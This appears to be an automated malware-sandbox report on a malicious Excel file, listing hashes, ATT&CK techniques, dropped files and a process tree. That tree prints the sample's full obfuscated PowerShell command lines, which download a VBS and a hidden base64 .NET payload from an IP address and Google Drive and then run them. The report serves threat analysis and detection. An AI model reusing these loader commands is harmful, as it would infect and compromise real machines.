8cd8de65f269a3096ab4090427fcb0d5f5ae99229f29465bc2bdb2c2ba304635

Analysis

max time kernel
122s
max time network
124s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
06-11-2024 15:34

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

KSACURFQAAB01.xla.xls
Size

645KB
MD5

0f35365b3df2274c5f34bd63be285912
SHA1

52571d67c3f6bb3db33dfb79bf157b181c6e9b6a
SHA256

8cd8de65f269a3096ab4090427fcb0d5f5ae99229f29465bc2bdb2c2ba304635
SHA512

e68276ad9a3cf89f3ce721dce123515efce9a22061ecde74d6662689c34229575dcfa72ff9a606a9148d07877f6b4b74397500d26bf206b56554df0377ba3dac
SSDEEP

12288:ebWNHd0zBVnumU9j/rVDWHlYG7GKanCl3qnklaYr+Uf:Ksd2u3FDWHlpVKXYr3

Score

10^/10

defense_evasion discovery execution

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://drive.google.com/uc?export=download&id=1UyHqwrnXClKBJ3j63Ll1t2StVgGxbSt0

exe.dropper

https://drive.google.com/uc?export=download&id=1UyHqwrnXClKBJ3j63Ll1t2StVgGxbSt0

Signatures

Blocklisted process makes network request 5 IoCs

flow	pid	Process
10	2988	mshta.exe
11	2988	mshta.exe
13	2632	pOWErSHElL.eXE
15	700	powershell.exe
17	700	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
1356	powershell.exe
700	powershell.exe

Evasion via Device Credential Deployment 2 IoCs

defense_evasion execution

pid	Process
2540	powershell.exe
2632	pOWErSHElL.eXE

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
15	drive.google.com
14	drive.google.com

Drops file in System32 directory 4 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	pOWErSHElL.eXE

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 9 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	pOWErSHElL.eXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe

Enumerates system info in registry 2 TTPs 1 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor	EXCEL.EXE

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
2460	EXCEL.EXE

Suspicious behavior: EnumeratesProcesses 6 IoCs

pid	Process
2632	pOWErSHElL.eXE
2540	powershell.exe
2632	pOWErSHElL.eXE
2632	pOWErSHElL.eXE
1356	powershell.exe
700	powershell.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	2632	pOWErSHElL.eXE
Token: SeDebugPrivilege	2540	powershell.exe
Token: SeDebugPrivilege	1356	powershell.exe
Token: SeDebugPrivilege	700	powershell.exe

Suspicious use of SetWindowsHookEx 5 IoCs

pid	Process
2460	EXCEL.EXE
2460	EXCEL.EXE
2460	EXCEL.EXE
2460	EXCEL.EXE
2460	EXCEL.EXE

Suspicious use of WriteProcessMemory 28 IoCs

description	pid	Process	procid_target
PID 2988 wrote to memory of 2632	2988	mshta.exe	33
PID 2988 wrote to memory of 2632	2988	mshta.exe	33
PID 2988 wrote to memory of 2632	2988	mshta.exe	33
PID 2988 wrote to memory of 2632	2988	mshta.exe	33
PID 2632 wrote to memory of 2540	2632	pOWErSHElL.eXE	35
PID 2632 wrote to memory of 2540	2632	pOWErSHElL.eXE	35
PID 2632 wrote to memory of 2540	2632	pOWErSHElL.eXE	35
PID 2632 wrote to memory of 2540	2632	pOWErSHElL.eXE	35
PID 2632 wrote to memory of 1972	2632	pOWErSHElL.eXE	36
PID 2632 wrote to memory of 1972	2632	pOWErSHElL.eXE	36
PID 2632 wrote to memory of 1972	2632	pOWErSHElL.eXE	36
PID 2632 wrote to memory of 1972	2632	pOWErSHElL.eXE	36
PID 1972 wrote to memory of 2868	1972	csc.exe	37
PID 1972 wrote to memory of 2868	1972	csc.exe	37
PID 1972 wrote to memory of 2868	1972	csc.exe	37
PID 1972 wrote to memory of 2868	1972	csc.exe	37
PID 2632 wrote to memory of 2668	2632	pOWErSHElL.eXE	39
PID 2632 wrote to memory of 2668	2632	pOWErSHElL.eXE	39
PID 2632 wrote to memory of 2668	2632	pOWErSHElL.eXE	39
PID 2632 wrote to memory of 2668	2632	pOWErSHElL.eXE	39
PID 2668 wrote to memory of 1356	2668	WScript.exe	40
PID 2668 wrote to memory of 1356	2668	WScript.exe	40
PID 2668 wrote to memory of 1356	2668	WScript.exe	40
PID 2668 wrote to memory of 1356	2668	WScript.exe	40
PID 1356 wrote to memory of 700	1356	powershell.exe	42
PID 1356 wrote to memory of 700	1356	powershell.exe	42
PID 1356 wrote to memory of 700	1356	powershell.exe	42
PID 1356 wrote to memory of 700	1356	powershell.exe	42

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\KSACURFQAAB01.xla.xls
1⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:2460

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe -Embedding
1⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2988
- C:\Windows\SysWOW64\WiNDoWSpowERshElL\V1.0\pOWErSHElL.eXE
  "C:\Windows\SystEM32\WiNDoWSpowERshElL\V1.0\pOWErSHElL.eXE" "PowersheLl -EX byPaSS -nOP -W 1 -C DevIceCREDENtiALdEpLOYMENt.exE ; IEX($(iEX('[sysTem.tExT.encOdIng]'+[chAr]58+[chAr]58+'Utf8.GEtSTrinG([SYsTEM.CoNveRT]'+[ChaR]0X3A+[CHAR]0X3A+'FroMbase64sTriNG('+[cHAr]34+'JHhTejB4TmxHaWk2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC10WXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lbWJFUmRFRkluSVRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMTW9OLkRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGdraXR5bWpubixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0QWxZenN4cSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBZm1BcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcHQsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeXBxeHVFdkFCKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiVFZmT3hnV2pUIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1lU1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhb1R3RkxYICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICR4U3oweE5sR2lpNjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzEwNy4xNzIuNjEuMTMwLzExMi9zZWV0aGViZXN0dGhpbmdzdG9nZXRtZXdpdGhncmVhdHRoaW5nc29uaGVyZS50SUYiLCIkZU52OkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc3RvZ2V0bWV3aXRoZ3JlYXR0aGluZ3Nvbi52YnMiLDAsMCk7c1RhUlQtc2xlZXAoMyk7U3RhUlQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVOdjpBUFBEQVRBXHNlZXRoZWJlc3R0aGluZ3N0b2dldG1ld2l0aGdyZWF0dGhpbmdzb24udmJzIg=='+[chAr]34+'))')))"
  2⤵
  - Blocklisted process makes network request
  - Evasion via Device Credential Deployment
  - Drops file in System32 directory
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2632
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX byPaSS -nOP -W 1 -C DevIceCREDENtiALdEpLOYMENt.exE
    3⤵
    - Evasion via Device Credential Deployment
    - Drops file in System32 directory
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2540
- - C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
    "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\rrkpwpvg.cmdline"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:1972
  - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
      C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1739.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC1738.tmp"
      4⤵
      System Location Discovery: System Language Discovery
      PID:2868
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\seethebestthingstogetmewithgreatthingson.vbs"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2668
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJHNIZWxsSURbMV0rJHNIRWxMaURbMTNdKydYJykgKCAoJ3QwM2ltYWdlVXJsID0gVWZsaHR0cHM6Ly9kcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3dubG9hZCZpZD0xVXlIcXdyblhDbEtCJysnSjNqNjNMbDF0MlN0VmdHeGJTdDAgVWZsO3QwM3dlYicrJ0NsaWVudCAnKyc9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQnKyc7dDAzaW1hZ2VCeXRlcyA9IHQwM3dlYkNsaWVudC5Eb3dubG9hZERhdGEodDAzaW1hZ2VVcmwpO3QwM2ltYWdlVGV4dCA9ICcrJ1tTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nJysnKHQwM2ltYWdlQnl0ZXMpO3QwM3N0YXJ0RmxhZyA9IFVmbDw8QkFTRTY0X1NUQVJUPj5VZmw7dDAzZW5kRmxhZyA9IFVmbDw8QkFTRTY0X0VORD4+VWZsO3QwM3N0YXJ0SW5kZXggPSB0MDNpbWFnZVRleHQuSW5kZXhPZih0MDNzdGFydEZsJysnYWcpO3QwM2VuZEluZGV4ID0gdDAzaW1hZ2VUZXh0LicrJ0luZGV4T2YodDAzZW5kRmxhZyk7dDAzc3RhcnRJbmRleCAtZ2UgMCAtYW5kJysnIHQwM2VuZEluZGV4JysnIC1ndCB0MDNzdGFydEluZGV4O3QwM3N0YXJ0JysnSW5kZXggKz0gdDAzc3RhcnRGbGFnJysnLkxlbmd0aDt0MDNiYXNlNjRMZW5ndGggPScrJyB0MDNlbmRJbmRleCAtIHQwM3N0YXJ0SW5kZXg7dDAzYmFzZTY0QycrJ29tbWFuZCA9IHQwM2ltYWdlVGV4dC5TdWJzJysndHInKydpbmcodDAzc3RhcnRJbmRleCwgdDAzYmFzZTY0TGVuJysnZ3RoKTt0MDNiYScrJ3NlNjRSZXZlcnNlZCA9IC1qb2luICh0MDNiYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCkgSFpWIEZvckVhY2gtT2JqZWN0IHsgdDAzXyB9KVstMS4uLSh0MDNiYXNlNjRDb21tYW5kLkxlbmd0aCldO3QwM2NvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcodDAzYmFzZTY0UmV2ZXJzZWQpO3QnKycwM2xvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCh0MDNjb21tYW5kQnl0ZXMpO3QwM3ZhaU1ldGhvZCA9IFtkbmxpYi5JTycrJy5Ib21lXS5HZXRNZXRob2QoVWZsVkFJVWZsKTt0MDN2YWlNZXRob2QuSW52b2tlKHQwM251bGwsIEAoVWZsJysndHh0LkdGU1NXWi8yMTEvMDMxLjE2LjI3MS43MDEvLzpwdHRoVWZsLCBVZmxkZXNhdGl2YWRvVWZsLCBVZmxkZXNhdGl2YWRvVWZsLCBVZmxkZXNhdGl2YWRvVWZsLCBVZmxhc3BuZXRfcmVnYnJvd3NlcnNVZmwsIFVmbGRlc2F0aXZhZG9VZmwsIFVmbGRlc2F0aXZhZG9VZmwsVWZsZGUnKydzYXRpdmFkb1VmbCxVZmxkZXNhdGl2YWRvVWZsLFVmbGRlc2F0aXYnKydhZG9VZicrJ2wsVWZsZGVzYXRpdmFkb1VmbCxVZmxkZXNhdGl2YWQnKydvVWZsLFVmbDFVZmwsVWZsZGVzYXRpdmFkb1VmbCkpOycpLlJFcExhY0UoKFtjSGFSXTcyK1tjSGFSXTkwK1tjSGFSXTg2KSxbc1RSSU5HXVtjSGFSXTEyNCkuUkVwTGFjRSgnVWZsJyxbc1RSSU5HXVtjSGFSXTM5KS5SRXBMYWNFKCd0MDMnLFtzVFJJTkddW2NIYVJdMzYpICk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
      4⤵
      Command and Scripting Interpreter: PowerShell
      Drops file in System32 directory
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:1356
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $sHellID[1]+$sHElLiD[13]+'X') ( ('t03imageUrl = Uflhttps://drive.google.com/uc?export=download&id=1UyHqwrnXClKB'+'J3j63Ll1t2StVgGxbSt0 Ufl;t03web'+'Client '+'= New-Object System.Net.WebClient'+';t03imageBytes = t03webClient.DownloadData(t03imageUrl);t03imageText = '+'[System.Text.Encoding]::UTF8.GetString'+'(t03imageBytes);t03startFlag = Ufl<<BASE64_START>>Ufl;t03endFlag = Ufl<<BASE64_END>>Ufl;t03startIndex = t03imageText.IndexOf(t03startFl'+'ag);t03endIndex = t03imageText.'+'IndexOf(t03endFlag);t03startIndex -ge 0 -and'+' t03endIndex'+' -gt t03startIndex;t03start'+'Index += t03startFlag'+'.Length;t03base64Length ='+' t03endIndex - t03startIndex;t03base64C'+'ommand = t03imageText.Subs'+'tr'+'ing(t03startIndex, t03base64Len'+'gth);t03ba'+'se64Reversed = -join (t03base64Command.ToCharArray() HZV ForEach-Object { t03_ })[-1..-(t03base64Command.Length)];t03commandBytes = [System.Convert]::FromBase64String(t03base64Reversed);t'+'03loadedAssembly = [System.Reflection.Assembly]::Load(t03commandBytes);t03vaiMethod = [dnlib.IO'+'.Home].GetMethod(UflVAIUfl);t03vaiMethod.Invoke(t03null, @(Ufl'+'txt.GFSSWZ/211/031.16.271.701//:ptthUfl, UfldesativadoUfl, UfldesativadoUfl, UfldesativadoUfl, Uflaspnet_regbrowsersUfl, UfldesativadoUfl, UfldesativadoUfl,Uflde'+'sativadoUfl,UfldesativadoUfl,Ufldesativ'+'adoUf'+'l,UfldesativadoUfl,Ufldesativad'+'oUfl,Ufl1Ufl,UfldesativadoUfl));').REpLacE(([cHaR]72+[cHaR]90+[cHaR]86),[sTRING][cHaR]124).REpLacE('Ufl',[sTRING][cHaR]39).REpLacE('t03',[sTRING][cHaR]36) )"
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:700

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8B2B9A00839EED1DFDCCC3BFC2F5DF12

Filesize
1KB

MD5
67e486b2f148a3fca863728242b6273e

SHA1
452a84c183d7ea5b7c015b597e94af8eef66d44a

SHA256
facaf1c3a4bf232abce19a2d534e495b0d3adc7dbe3797d336249aa6f70adcfb

SHA512
d3a37da3bb10a9736dc03e8b2b49baceef5d73c026e2077b8ebc1b786f2c9b2f807e0aa13a5866cf3b3cafd2bc506242ef139c423eaffb050bbb87773e53881e

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B46811C17859FFB409CF0E904A4AA8F8

Filesize
436B

MD5
971c514f84bba0785f80aa1c23edfd79

SHA1
732acea710a87530c6b08ecdf32a110d254a54c8

SHA256
f157ed17fcaf8837fa82f8b69973848c9b10a02636848f995698212a08f31895

SHA512
43dc1425d80e170c645a3e3bb56da8c3acd31bd637329e9e37094ac346ac85434df4edcdbefc05ae00aea33a80a88e2af695997a495611217fe6706075a63c58

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8B2B9A00839EED1DFDCCC3BFC2F5DF12

Filesize
174B

MD5
afc12237f1224dd02ec11e9cbe5686dd

SHA1
92342796b87fcd8759e0d7218031faf5ec2c04eb

SHA256
f3398213d0c3d86d36a7f2e6af1d3951e1667660d388f3eb6b50aa35d15b1f3e

SHA512
6e52b6f4e5486efdfcf89795099e83c62d171fed068bb17b86e13cc8140977d80654857d3a1dcf3edc221c22b7e5e477ba8e5fc557547a491e2cb0fc1500ffee

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B46811C17859FFB409CF0E904A4AA8F8

Filesize
170B

MD5
ed8a22a3c4aff864d6f09552923966be

SHA1
a9812b16e086aab46876e899ac8521bea73ad548

SHA256
2e9fda83ea3c9f302c99069fe785b43d838d550f15bf238e944eadea02e59870

SHA512
a3bf3094cdf98b9063d22a6b3b958fd13367a9c1a8894437a2ee8f8c783c867e2878fc20198ed34b65e0ef6b869820969077448e7c71deb6baaf5298af3df205

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\M4TQDAHL\goodthingsforentireprocessgetmebackwithgoodnewsthings[1].hta

Filesize
8KB

MD5
6774dc51483d737c2e2f25d5d57c5a46

SHA1
2405efc3774d3220a22b5f7a619749e803b601fb

SHA256
ed44e9061bebc3b1fb93ab1fb2007ac62651ef49002614dda38c4b82875e81e9

SHA512
29b84bdd6091406e438677c3bd5b8e538443b1ffe7a77b384f9ac40c015b4c704b32837c65b4590d3f877db81a458964f57ca3793f9a30bf7ec2378670871b94

Download Submit
C:\Users\Admin\AppData\Local\Temp\CabE24.tmp

Filesize
70KB

MD5
49aebf8cbd62d92ac215b2923fb1b9f5

SHA1
1723be06719828dda65ad804298d0431f6aff976

SHA256
b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

SHA512
bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES1739.tmp

Filesize
1KB

MD5
b922a5defa6fb4e0ae78e7d6f795b895

SHA1
79a6fc99b5beee06ae8de0a125f018a89ed41bc3

SHA256
b3fd70e11c4648c14ec22a9719f91c35984597cb3f44e50f6db28b56b705bc6a

SHA512
b84cc5930b83ade6f50ba064de0795976361f139c66901f18f9d71f58b937b08c167b7134f28da3118b4e18816099b22ed93fbf716c71ec305df189046111ea9

Download Submit
C:\Users\Admin\AppData\Local\Temp\rrkpwpvg.dll

Filesize
3KB

MD5
700f783e0b874bb0adcacfa6ca2c5b58

SHA1
04c717052e3d506dc3631b69cdc2f3a11c4662e0

SHA256
ed7ea271543b1488744b6dd69d74de4527144824d1ccc4ee8bdcaa8bf8750b63

SHA512
a399515636e83765fd605fbb5faeab0096668bfa4eb1418cada220d798f72efbe6026940f0a93707a1db876cfc57ce6d5f3a2de5f929693b09a5ffd38addcfc3

Download Submit
C:\Users\Admin\AppData\Local\Temp\rrkpwpvg.pdb

Filesize
7KB

MD5
dd872382564ca4d81bf84607029254c9

SHA1
4c53d8ae63885f38572e2187a2583f20b6a3ef54

SHA256
061f9ca2388db36632d9853b7aaf5b7697a40d85a1361ead2f1dff09c9e66657

SHA512
b8c6929dd879d2c3b97e2605938885743b014a216082f27c3f80b41a6bcdd957fd1dd65fd6a357d34feab853dff4dc2f7dae7858bd7f9d7f9cf11d2a0529722c

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
56bc57e1063074f27f54020d9fc54fe7

SHA1
bbc79982ac5dcd3c9a2fe40bfa3834c249c8da43

SHA256
626068274a76ddda93b8f3005b71c7e9446e02b0e2ce4f8f4ec1f7f3a2423c4d

SHA512
7f8b407924bc8f5208cb85060fbb4d62599064a86ba56cc0ddace324c70edfef80e0b93387f0f28a50a4a83d0072f96236e1703b2d2c6dcfceac314d56be8134

Download Submit
C:\Users\Admin\AppData\Roaming\seethebestthingstogetmewithgreatthingson.vbs

Filesize
138KB

MD5
494642e2a61a8b0e6bc9ebf07f58aa62

SHA1
d7975e4dc0bedd03fbba1390e3e75bfd5f4c725c

SHA256
ebe70ca2f1c620ca9e3615c0a69e3bf5fffeb3f9f8ba6672eab20c9e952ad311

SHA512
ea79a010e1d7820cc7513c26614be8fc0b3d322055035815458b608be08e4bea293983c68c85a7f6746272d0ba86d45caa66e8d5318d78e8d565bd42a27c1aae

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSC1738.tmp

Filesize
652B

MD5
578f004ea79d7d5e2f7bf679ba900458

SHA1
dbfa7a30384da6bb18787fa008684f33abece82c

SHA256
e5fd6ee02adb2ff7d1bc68653a98310e9784c5e95d9333076f7182937eac394a

SHA512
e54a44a11be66938ff1bbc9d9d76df6478e88e8e71a18ffb13acc4b927047cd31e6a6b46321843c554233e9a417d32763d526f0f5e5ffb0317f6f9d66ba127f5

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\rrkpwpvg.0.cs

Filesize
486B

MD5
af0e0993b960e9bba00f8a8f483423d8

SHA1
45f4d42e16df29c262a7e626cdad0281f19b99e9

SHA256
2d5ac3d6056b2457bb1605d4bf44784ef1a51fb02ef49b5b384cd1c011255b0f

SHA512
47e60eaf671bd7edf358d65416c2ca04b766f20e2ae733fc75720244d7a0366914e187142fa07cce86202497435cfec6bc573c4ede7d5cb00472d7ba33964919

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\rrkpwpvg.cmdline

Filesize
309B

MD5
f88ba8d7e18725eb28550078211acfbe

SHA1
141c0724244e9510da281871b23790883262fd8c

SHA256
af791b3221e11eb85da653f7d36417074c28f234907ba60067ee402a78783e8b

SHA512
507b0b1d2fa9f1eab934c9b42c464138fc02c4e88e389b2a4add80b8d09cda1e9d60c937d8ef52c1155a52e95247300a505d097c1553d0a1c7e37c85ce11d233

Download Submit
memory/2460-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/2460-18-0x0000000002460000-0x0000000002462000-memory.dmp

Filesize
8KB

Download
memory/2460-3-0x00000000724DD000-0x00000000724E8000-memory.dmp

Filesize
44KB

Download
memory/2460-1-0x00000000724DD000-0x00000000724E8000-memory.dmp

Filesize
44KB

Download
memory/2988-17-0x0000000000480000-0x0000000000482000-memory.dmp

Filesize
8KB

Download